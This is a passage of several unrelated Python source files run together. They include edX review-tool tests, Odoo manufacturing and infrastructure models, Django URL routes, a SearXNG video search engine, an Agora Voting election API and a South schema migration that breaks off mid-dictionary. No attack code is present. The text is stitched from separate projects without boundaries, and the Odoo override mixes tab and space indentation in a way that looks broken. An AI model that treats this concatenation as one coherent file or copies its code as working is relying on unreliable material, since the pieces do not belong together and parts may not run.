        If a user has not seen any problems, they should
        receive a response to go out and try more problems so they have
        material to review.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool'
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_h2 = 'Nothing to review'
        self.assertIn(expected_h2, response.content)

    @ddt.data(5, 7)
    def test_too_few_review_problems(self, num_desired):
        """
        If a user does not have enough problems to review, they should
        receive a response to go out and try more problems so they have
        material to review.

        Testing loading 4 problems and asking for 5 and then loading every
        problem and asking for more than that.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Want to load fewer problems than num_desired
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        if num_desired > 6:
            self.client.get(reverse(
                'courseware_section',
                kwargs={
                    'course_id': self.course_actual.id,
                    'chapter': self.chapter_actual.location.name,
                    'section': self.section2_actual.location.name,
                }
            ))
            self.client.get(reverse(
                'courseware_section',
                kwargs={
                    'course_id': self.course_actual.id,
                    'chapter': self.chapter_actual.location.name,
                    'section': self.section3_actual.location.name,
                }
            ))

        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool',
                num_desired=num_desired
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_h2 = 'Nothing to review'

        self.assertIn(expected_h2, response.content)

    @ddt.data(2, 6)
    def test_review_problems(self, num_desired):
        """
        If a user has enough problems to review, they should
        receive a response where there are review problems for them to try.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section2_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool',
                num_desired=num_desired
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_header_text = 'Review Problems'
        # The problems are defaulted to correct upon load
        # This happens because the problems "raw_possible" field is 0 and the
        # "raw_earned" field is also 0.
        expected_correctness_text = 'correct'
        expected_problems = ['Review Problem 1', 'Review Problem 2', 'Review Problem 3',
                             'Review Problem 4', 'Review Problem 5', 'Review Problem 6']

        self.assertIn(expected_header_text, response.content)
        self.assertEqual(response.content.count(expected_correctness_text), num_desired)
        # Since the problems are randomly selected, we have to check
        # the correct number of problems are returned.
        count = 0
        for problem in expected_problems:
            if problem in response.content:
                count += 1
        self.assertEqual(count, num_desired)
        self.assertEqual(response.content.count(self.URL_BEGINNING), num_desired)

    @ddt.data(2, 6)
    def test_review_problem_urls(self, num_desired):
        """
        Verify that the URLs returned from the Review xBlock are valid and
        correct URLs for the problems the learner has seen.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section2_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_urls = get_review_ids.get_problems(num_desired, self.course_actual.id)

        expected_urls = [
            (self.URL_BEGINNING + 'problem+block@Problem_1', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_2', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_3', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_4', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_5', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_6', True, 0)
        ]

        # Since the problems are randomly selected, we have to check
        # the correct number of urls are returned.
        count = 0
        for url in expected_urls:
            if url in result_urls:
                count += 1
        self.assertEqual(count, num_desired)

    @ddt.data(2, 5)
    def test_review_problem_urls_unique_problem(self, num_desired):
        """
        Verify that the URLs returned from the Review xBlock are valid and
        correct URLs for the problems the learner has seen. This test will give
        a unique problem to a learner and verify only that learner sees
        it as a review. It will also ensure that if a learner has not loaded a
        problem, it should never show up as a review problem
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_urls = get_review_ids.get_problems(num_desired, self.course_actual.id)

        expected_urls = [
            (self.URL_BEGINNING + 'problem+block@Problem_1', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_2', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_3', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_4', True, 0),
            # This is the unique problem when num_desired == 5
            (self.URL_BEGINNING + 'problem+block@Problem_6', True, 0)
        ]
        expected_not_loaded_problem = (self.URL_BEGINNING + 'problem+block@Problem_5', True, 0)

        # Since the problems are randomly selected, we have to check
        # the correct number of urls are returned.
        count = 0
        for url in expected_urls:
            if url in result_urls:
                count += 1
        self.assertEqual(count, num_desired)
        self.assertNotIn(expected_not_loaded_problem, result_urls)

    # NOTE: This test is failing because when I grab the problem from the CSM,
    # it is unable to find its parents. This is some issue with the BlockStructure
    # and it not being populated the way we want. For now, this is being left out
    # since the first course I'm working with does not use this function.
    # TODO: Fix get_vertical from get_review_ids to have the block structure for this test
    # or fix something in this file to make sure it populates the block structure for the CSM
    @unittest.skip
    def test_review_vertical_url(self):
        """
        Verify that the URL returned from the Review xBlock is a valid and
        correct URL for the vertical the learner has seen.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has problems and thus a vertical in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))

        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_url = get_review_ids.get_vertical(self.course_actual.id)

        expected_url = self.URL_BEGINNING + 'vertical+block@New_Unit_1'

        self.assertEqual(result_url, expected_url)

# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)


import time
from datetime import datetime

import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp import netsvc
from openerp import tools

class mrp_production(osv.osv):   
    _inherit = 'mrp.production'
    
    def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
        """ Computes bills of material of a product.
        @param properties: List containing dictionaries of properties.
        @return: No. of products.
        """
        if properties is None:
            properties = []
        results = []
        bom_obj = self.pool.get('mrp.bom')
        uom_obj = self.pool.get('product.uom')
        prod_line_obj = self.pool.get('mrp.production.product.line')
        workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
        for production in self.browse(cr, uid, ids):
            #unlink product_lines
            prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)
    
            #unlink workcenter_lines
            workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)
    
            # search BoM structure and route
            bom_point = production.bom_id
            bom_id = production.bom_id.id
            if not bom_point:
                bom_id = bom_obj._bom_find(cr, uid, production.product_id.id, production.product_uom.id, properties)
                if bom_id:
                    bom_point = bom_obj.browse(cr, uid, bom_id)
                    routing_id = bom_point.routing_id.id or False
                    self.write(cr, uid, [production.id], {'bom_id': bom_id, 'routing_id': routing_id})
    
            if not bom_id:
				continue
    
            # get components and workcenter_lines from BoM structure
            factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
            res = bom_obj._bom_explode(cr, uid, bom_point, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id)
            results = res[0] # product_lines
            results2 = res[1] # workcenter_lines
    
            # reset product_lines in production order
            for line in results:
                line['production_id'] = production.id
                prod_line_obj.create(cr, uid, line)
    
            #reset workcenter_lines in production order
            for line in results2:
                line['production_id'] = production.id
                workcenter_line_obj.create(cr, uid, line)
        return results

    def action_ready(self, cr, uid, ids, context=None):
        """ Changes the production state to Ready and location id of stock move.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        self.write(cr, uid, ids, {'state': 'ready'})

        for production in self.browse(cr, uid, ids, context=context):            
            if not production.bom_id:
                produce_move_id = self._make_production_produce_line(cr, uid, production, context=context)

        for (production_id,name) in self.name_get(cr, uid, ids):
            production = self.browse(cr, uid, production_id)
            if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
                move_obj.write(cr, uid, [production.move_prod_id.id],
                        {'location_id': production.location_dest_id.id})
        return True

    def action_produce(self, cr, uid, production_id, production_qty, production_mode, context=None):        
        production = self.browse(cr, uid, production_id, context=context)
        if not production.bom_id and production.state == 'ready':
            wf_service = netsvc.LocalService("workflow")
            wf_service.trg_validate(uid, 'mrp.production', production_id, 'button_produce', cr)
        return super(mrp_production, self).action_produce(cr, uid, production_id, production_qty, production_mode, context=context)
mrp_production()    

# ETConf -- web-based user-friendly computer hardware configurator
# Copyright (C) 2010-2011 ETegro Technologies, PLC <http://etegro.com/>
#                         Sergey Matveev <sergey.matveev@etegro.com>
# 
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
# 
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from django.conf.urls.defaults import *

urlpatterns = patterns( "configurator.giver.views",
	( r"^perform/(?P<computermodel_alias>.+)/$", "perform" ),
	( r"^configurator/(?P<computermodel_alias>.+)/$", "configurator" ),
	( r"^computermodel/request/(?P<computermodel_alias>.+)$", "computermodel_request" ),
)

# -*- coding: utf-8 -*-
##############################################################################
#
#    Infrastructure
#    Copyright (C) 2014 Ingenieria ADHOC
#    No email
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################


import re
from openerp import netsvc
from openerp.osv import osv, fields

class database_type(osv.osv):
    """"""
    
    _name = 'infrastructure.database_type'
    _description = 'database_type'

    _columns = {
        'name': fields.char(string='Name', required=True),
        'prefix': fields.char(string='Prefix', required=True, size=4),
        'url_prefix': fields.char(string='URL Prefix'),
        'automatic_drop': fields.boolean(string='Automatic Drop'),
        'automatic_drop_days': fields.integer(string='Automatic Drop Days'),
        'protect_db': fields.boolean(string='Protect DBs?'),
        'color': fields.integer(string='Color'),
        'automatic_deactivation': fields.boolean(string='Atumatic Deactivation?'),
        'auto_deactivation_days': fields.integer(string='Automatic Drop Days'),
        'url_example': fields.char(string='URL Example'),
        'bd_name_example': fields.char(string='BD Name Example'),
        'db_back_up_policy_ids': fields.many2many('infrastructure.db_back_up_policy', 'infrastructure_database_type_ids_db_back_up_policy_ids_rel', 'database_type_id', 'db_back_up_policy_id', string='Suggested Backup Policies'), 
    }

    _defaults = {
    }


    _constraints = [
    ]




database_type()

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

# SPDX-License-Identifier: AGPL-3.0-or-later
"""
 SepiaSearch (Videos)
"""

from json import loads
from dateutil import parser, relativedelta
from urllib.parse import urlencode
from datetime import datetime

# about
about = {
    "website": 'https://sepiasearch.org',
    "wikidata_id": None,
    "official_api_documentation": "https://framagit.org/framasoft/peertube/search-index/-/tree/master/server/controllers/api",  # NOQA
    "use_official_api": True,
    "require_api_key": False,
    "results": 'JSON',
}

categories = ['videos']
paging = True
time_range_support = True
safesearch = True
supported_languages = [
    'en', 'fr', 'ja', 'eu', 'ca', 'cs', 'eo', 'el',
    'de', 'it', 'nl', 'es', 'oc', 'gd', 'zh', 'pt',
    'sv', 'pl', 'fi', 'ru'
]
base_url = 'https://sepiasearch.org/api/v1/search/videos'

safesearch_table = {
    0: 'both',
    1: 'false',
    2: 'false'
}

time_range_table = {
    'day': relativedelta.relativedelta(),
    'week': relativedelta.relativedelta(weeks=-1),
    'month': relativedelta.relativedelta(months=-1),
    'year': relativedelta.relativedelta(years=-1)
}


embedded_url = '<iframe width="540" height="304" src="{url}" frameborder="0" allowfullscreen></iframe>'


def minute_to_hm(minute):
    if isinstance(minute, int):
        return "%d:%02d" % (divmod(minute, 60))
    return None


def request(query, params):
    params['url'] = base_url + '?' + urlencode({
        'search': query,
        'start': (params['pageno'] - 1) * 10,
        'count': 10,
        'sort': '-match',
        'nsfw': safesearch_table[params['safesearch']]
    })

    language = params['language'].split('-')[0]
    if language in supported_languages:
        params['url'] += '&languageOneOf[]=' + language
    if params['time_range'] in time_range_table:
        time = datetime.now().date() + time_range_table[params['time_range']]
        params['url'] += '&startDate=' + time.isoformat()

    return params


def response(resp):
    results = []

    search_results = loads(resp.text)

    if 'data' not in search_results:
        return []

    for result in search_results['data']:
        title = result['name']
        content = result['description']
        thumbnail = result['thumbnailUrl']
        publishedDate = parser.parse(result['publishedAt'])
        embedded = embedded_url.format(url=result.get('embedUrl'))
        author = result.get('account', {}).get('displayName')
        length = minute_to_hm(result.get('duration'))
        url = result['url']

        results.append({'url': url,
                        'title': title,
                        'content': content,
                        'author': author,
                        'length': length,
                        'template': 'videos.html',
                        'publishedDate': publishedDate,
                        'embedded': embedded,
                        'thumbnail': thumbnail})

    return results

# -*- coding: utf-8 -*-

#
# SPDX-FileCopyrightText: 2013-2021 Agora Voting SL <contact@nvotes.com>
#
# SPDX-License-Identifier: AGPL-3.0-only
#
import pickle
import base64
import json
import re
from datetime import datetime

from flask import Blueprint, request, make_response, abort

from frestq.utils import loads, dumps
from frestq.tasks import SimpleTask, TaskError
from frestq.app import app, db

from models import Election, Authority, QueryQueue
from create_election.performer_jobs import check_election_data


from taskqueue import queue_task, apply_task, dequeue_task

public_api = Blueprint('public_api', __name__)

def error(status, message=""):
    if message:
        data = json.dumps(dict(message=message))
    else:
        data=""
    return make_response(data, status)


@public_api.route('/dequeue', methods=['GET'])
def dequeue():
    try:
        dequeue_task()
    except Exception as e:
        return make_response(dumps(dict(status=e.message)), 202)

    return make_response(dumps(dict(status="ok")), 202)


@public_api.route('/election', methods=['POST'])
def post_election():
    '''
    POST /election

    Creates an election, with the given input data. This involves communicating
    with the different election authorities to generate the joint public key.

    Example request:
    POST /election
    {
      "id": 1110,
      "title": "Votación de candidatos",
      "description": "Selecciona los documentos polí­tico, ético y organizativo con los que Podemos",
      "director": "wadobo-auth1",
      "authorities": "openkratio-authority",
      "layout": "pcandidates-election",
      "presentation": {
        "share_text": "lo que sea",
        "theme": "foo",
        "urls": [
          {
            "title": "",
            "url": ""
          }
        ],
        "theme_css": "whatever"
      },
      "end_date": "2013-12-09T18:17:14.457000",
      "start_date": "2013-12-06T18:17:14.457000",
      "questions": [
          {
              "description": "",
              "layout": "pcandidates-election",
              "max": 1,
              "min": 0,
              "num_winners": 1,
              "title": "Secretarí­a General",
              "randomize_answer_order": true,
              "tally_type": "plurality-at-large",
              "answer_total_votes_percentage": "over-total-valid-votes",
              "answers": [
                {
                  "id": 0,
                  "category": "Equipo de Enfermeras",
                  "details": "",
                  "sort_order": 1,
                  "urls": [
                    {
                      "title": "",
                      "url": ""
                    }
                  ],
                  "text": "Fulanita de tal",
                }
              ]
          }
      ],
      "authorities": [
        {
          "name": "Asociación Sugus GNU/Linux",
          "orchestra_url": "https://sugus.eii.us.es/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        },
        {
          "name": "Agora Ciudadana",
          "orchestra_url": "https://agoravoting.com:6874/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        },
        {
          "name": "Wadobo Labs",
          "orchestra_url": "https://wadobo.com:6874/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        }
      ]
    }


    On success, response is empty with status 202 Accepted and returns something
    like:

    {
        "task_id": "ba83ee09-aa83-1901-bb11-e645b52fc558",
    }
    When the election finally gets processed, the callback_url is called with a
    POST containing the protInfo.xml file generated jointly by each
    authority, following this example response:

    {
        "status": "finished",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /election"
        },
        "session_data": [{
            "session_id": "deadbeef-03fa-4890-aa83-2fc558e645b5",
            "publickey": ["<pubkey codified in hexadecimal>"]
        }]
    }

    Note that this protInfo.xml will contain the election public key, but
    also some other information. In particular, it's worth noting that
    the http and hint servers' urls for each authority could change later,
    if election-orchestra needs it.

    If there was an error, then the callback will be called following this
    example format:

    {
        "status": "error",
        "reference": {
            "session_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /election"
        },
        "data": {
            "message": "error message"
        }
    }
    '''

    data = request.get_json(force=True, silent=True)
    d = base64.b64encode(pickle.dumps(data)).decode('utf-8')
    queueid = queue_task(task='election', data=d)

    return make_response(dumps(dict(queue_id=queueid)), 202)


@public_api.route('/tally', methods=['POST'])
def post_tally():
    '''
    POST /tally

    Tallies an election, with the given input data. This involves communicating
    with the different election authorities to do the tally.

    Example request:
    POST /tally
    {
        "election_id": 111,
        "callback_url": "https://127.0.0.1:5000/public_api/receive_tally",
        "votes_url": "https://127.0.0.1:5000/public_data/vota4/encrypted_ciphertexts",
        "votes_hash": "ni:///sha-256;f4OxZX_x_FO5LcGBSKHWXfwtSx-j1ncoSt3SABJtkGk"
    }

    On success, response is empty with status 202 Accepted and returns something
    like:

    {
        "task_id": "ba83ee09-aa83-1901-bb11-e645b52fc558",
    }

    When the election finally gets processed, the callback_url is called with POST
    similar to the following example:

    {
        "status": "finished",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /tally"
        },
        "data": {
            "votes_url": "https://127.0.0.1:5000/public_data/vota4/tally.tar.bz2",
            "votes_hash": "ni:///sha-256;f4OxZX_x_FO5LcGBSKHWXfwtSx-j1ncoSt3SABJtkGk"
        }
    }

    If there was an error, then the callback will be called following this
    example format:

    {
        "status": "error",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /tally"
        },
        "data": {
            "message": "error message"
        }
    }
    '''

    # first of all, parse input data
    data = request.get_json(force=True, silent=True)
    d = base64.b64encode(pickle.dumps(data)).decode('utf-8')
    queueid = queue_task(task='tally', data=d)
    return make_response(dumps(dict(queue_id=queueid)), 202)

@public_api.route('/receive_election', methods=['POST'])
def receive_election():
    '''
    This is a test route to be able to test that callbacks are correctly sent
    '''
    print("ATTENTION received election callback: ")
    print(request.get_json(force=True, silent=True))
    return make_response("", 202)


@public_api.route('/receive_tally', methods=['POST'])
def receive_tally():
    '''
    This is a test route to be able to test that callbacks are correctly sent
    '''
    print("ATTENTION received tally callback: ")
    print(request.get_json(force=True, silent=True))
    return make_response("", 202)

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding field 'UserProject.drive_auth'
        db.add_column(u'user_project', 'drive_auth',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)


    def backwards(self, orm):
        # Deleting field 'UserProject.drive_auth'
        db.delete_column(u'user_project', 'drive_auth')


    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'home.category': {
            'Meta': {'object_name': 'Category', 'db_table': "u'category'"},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '150'})
        },
        'projects.project': {
            'Meta': {'object_name': 'Project', 'db_table': "u'project'"},
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['home.Category']", 'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'image_original_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'licence': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'type_field': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'db_column': "'type'", 'blank': 'True'})
        },
        'projects.projectpart': {
            'Meta': {'object_name': 'ProjectPart', 'db_table': "u'project_part'"},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projectpart_created_user'", 'to': "orm['auth.User']"}),
            'drive_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'modified_user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'projectpart_modified_user'", 'null': 'True', 'to': "orm['auth.User']"}),
            'order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.Project']"}),
            'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.ProjectPart']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'projects.userproject': {
